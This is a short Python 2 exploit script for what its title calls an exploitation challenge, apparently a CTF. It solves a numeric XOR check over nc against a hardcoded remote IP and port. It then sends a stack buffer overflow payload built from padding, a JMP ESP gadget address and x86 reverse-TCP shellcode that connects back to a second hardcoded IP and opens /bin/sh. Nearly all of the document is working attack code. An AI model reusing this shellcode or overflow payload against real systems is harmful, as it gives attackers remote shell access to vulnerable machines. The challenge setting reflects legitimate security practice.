Simple remote exploit for an exploitation challenge
#!/usr/bin/env python2
# Python 2 script (see the shebang): the byte-string handling below relies on
# str and bytes being the same type.
try:
    import binexpect
except ImportError:
    # binexpect is a third-party pexpect wrapper; without it the script aborts
    # with the pointer below.
    # NOTE(review): the URL in the message reads "http:#" -- presumably a
    # mangled "http://"; left untouched because it is runtime text.
    exit("""
pexpect sucks for sending binary data. binexpect fixes this and can be
found at this url: http:#darksaber.tk/wapiflapi/binexpect.py Not sure
if the file will be there for ever, but you don't need this anyway.
""")
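def encode(num):
    """Return ``num`` XOR-ed with the fixed 32-bit mask ``0xAAAAAAAA``.

    The original built the mask in a loop (shift left one nibble, add 10,
    eight times), which always yields 0xAAAAAAAA, and carried an unused
    counter ``v8``.  The constant is used directly; the result is identical
    for every ``num`` (XOR leaves any bits above bit 31 unchanged).

    :param num: integer to encode.
    :return: ``num ^ 0xAAAAAAAA``.
    """
    mask = 0xAAAAAAAA  # eight nibbles of 0xA, exactly what the old loop produced
    return mask ^ num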
def reverse_tcp_shellcode(ip='127.1.1.1', port=1337):
    """Return the fixed opcode string with ``ip`` and ``port`` spliced in.

    ``ip`` is packed with ``socket.inet_aton`` and ``port`` as a big-endian
    unsigned short (``struct.pack(">H")``); every other part of the result is
    a literal.  Callers treat the return value as raw bytes.
    """
    import socket
    import struct
    # NOTE(review): Python 2 only -- under Python 3 the str literals cannot be
    # concatenated with the bytes returned by inet_aton/struct.pack (TypeError).
    # Adjacent literals are joined by the parser before the "+" operators run,
    # so the grouping below must stay exactly as written.
    shellcode = (
        "\x6a\x66\x58\x6a\x01\x5b\x31\xd2"
        "\x52\x53\x6a\x02\x89\xe1\xcd\x80"
        "\x92\xb0\x66\x68" + socket.inet_aton(ip) +
        "\x66\x68" + struct.pack(">H", int(port)) + "\x43\x66\x53\x89"
        "\xe1\x6a\x10\x51\x52\x89\xe1\x43"
        "\xcd\x80\x6a\x02\x59\x87\xda\xb0"
        "\x3f\xcd\x80\x49\x79\xf9\xb0\x0b"
        "\x41\x89\xca\x52\x68\x2f\x2f\x73"
        "\x68\x68\x2f\x62\x69\x6e\x89\xe3"
        "\xcd\x80"
    )
    return shellcode
if __name__ == '__main__':
    # Entry point: drive the remote service over nc via binexpect.  The
    # localhost line is the commented-out local test target.
    # target = binexpect.spawn("nc localhost 8888", timeout=None)
    target = binexpect.spawn("nc 23.25.135.4 1984", timeout=None)
    # The service prints a number; the expected reply is its encode()d value
    # sent back as decimal text.  NOTE(review): the trailing "." in the
    # pattern is an unescaped regex wildcard, and "\d*" also matches an empty
    # group, in which case int() would raise ValueError.
    target.expect('The answer is (\d*).')
    answer = int(target.match.group(1))
    target.sendline(str(encode(answer)))
    target.expect('The dungeon shakes')
    # Passed the question successfully, craft the payload
    # 256 bytes read from input, allowing overflow of the buffer.
    # 0x08048640 JMP $esp - Gadget to jump to shellcode at $ESP
    payload = (78 * 'A') + "\x40\x86\x04\x08"
    payload += reverse_tcp_shellcode(ip='188.166.53.117')
    print("Sending payload")
    # sendbinline is the binexpect helper for raw bytes (plain pexpect
    # sendline would mangle them, per the import-error message above).
    target.sendbinline(payload)
    target.interact()